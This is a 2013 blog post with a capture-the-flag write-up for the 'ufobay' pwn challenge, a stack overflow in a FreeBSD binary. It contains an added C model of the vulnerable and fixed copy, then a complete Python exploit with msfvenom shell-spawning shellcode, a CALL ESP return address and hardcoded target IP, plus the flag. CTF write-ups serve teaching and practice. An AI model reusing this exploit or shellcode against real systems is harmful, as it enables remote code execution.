Monday, July 22, 2013

UFO CTF 2013 - pwn 100 - ufobay - [Team xbios]

The given binary is a 32-bit, statically linked FreeBSD ELF executable. After setting up a FreeBSD 9.1 VM, I started analysing the binary. The binary requires a user ufobay and the database file /home/ufobay/ufobay.db. We noticed a buffer overflow vulnerability in option 1, where the parcel is read: the user can supply 256 bytes of data, and 172 bytes are enough to overwrite the saved EIP.

Here is the idea of the exploit:

[*] Overwrite saved EIP with CALL ESP gadget
[*] Place the shellcode immediately after the CALL ESP gadget
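Why the length check matters, as an added example that is not from the write-up or the challenge: a C model of the parcel handler's frame built from the offsets reported above, with the unchecked store beside a hardened one. The 168-byte buffer, the 256-byte limit and the frame layout are assumptions, since the challenge source is not public.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Model of the parcel handler's frame from the offsets the write-up reports
 * (saved EBP at byte 168, saved EIP at 172, 256 bytes accepted). The layout is
 * an assumption; the challenge source is not public. */
#define PARCEL_LIMIT 256
#define PARCEL_BUF   168

struct frame {
    unsigned char parcel[PARCEL_BUF];
    uint32_t saved_ebp;
    uint32_t saved_eip;
    unsigned char caller[PARCEL_LIMIT - PARCEL_BUF - 8]; /* bytes beyond EIP */
};

/* Vulnerable shape: size is checked against the service limit, never against
 * the buffer, so bytes 168..175 land on saved EBP and saved EIP. */
int store_parcel_unchecked(struct frame *f, const unsigned char *data, size_t size)
{
    if (size > PARCEL_LIMIT)
        return -1;
    memcpy(f, data, size);          /* runs past parcel[] into the saved registers */
    return (int)size;
}

/* Hardened form: size is bounded by the destination buffer itself. */
int store_parcel_checked(struct frame *f, const unsigned char *data, size_t size)
{
    if (size > sizeof f->parcel)
        return -1;
    memcpy(f->parcel, data, size);
    return (int)size;
}

/* Constructed input with the write-up's layout: 168 filler bytes, then the
 * EBP and return-address words in host byte order; no shellcode. */
size_t build_parcel(unsigned char *out, size_t cap, uint32_t ebp, uint32_t eip)
{
    if (cap < PARCEL_BUF + 8)
        return 0;
    memset(out, 0x90, PARCEL_BUF);
    memcpy(out + PARCEL_BUF, &ebp, sizeof ebp);
    memcpy(out + PARCEL_BUF + 4, &eip, sizeof eip);
    return PARCEL_BUF + 8;
}
```

Storing the 176-byte parcel through store_parcel_unchecked leaves saved_eip equal to the gadget address the exploit plants, while store_parcel_checked refuses the same input and only accepts parcels that fit inside parcel[].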

Below is the exploit:
#!/usr/bin/env python

import struct
import socket
import time

# msfvenom -p bsd/x86/exec CMD='/bin/sh -c sh<&5 >&5' -a x86_64 -b '\x0a'
shellcode = ( "\x6a\x3b\x58\x99\x52\x68\x2d\x63\x00\x00\x89\xe7\x52\x68" +
              "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\xe8\x15" +
              "\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20" +
              "\x73\x68\x3c\x26\x35\x20\x3e\x26\x35\x00\x57\x53\x89\xe1" +
              "\x52\x51\x53\x50\xcd\x80")

ret_addr = struct.pack("<I", 0x080ff46d) # call esp
NOP = struct.pack("B", 0x90)
EBP = struct.pack("<I", 0x0815c080)      # value that lands in the saved EBP slot
payload = NOP * 168 + EBP + ret_addr + shellcode  # shellcode sits at ESP when the gadget runs

ip = '92.63.96.226'
#ip = '192.168.122.200'
port = 1337

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
time.sleep(1)
print soc.recv(1024)

# option
soc.send("1\n")
time.sleep(0.5)
print soc.recv(512)

# source
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# destination
soc.send("A\n")
time.sleep(0.5)
print soc.recv(512)

# size
soc.send(str(len(payload)) + "\n")
time.sleep(0.5)
print soc.recv(512)

# parcel
soc.send(payload + "\n")
time.sleep(0.5)

soc.send("cat key\n")
time.sleep(0.5)
print soc.recv(1024)

The flag for the challenge is H0wCanW3D3F3atAL1ENZ.

2 comments:

  1. Could you please share the challenge file?

    Thank you very much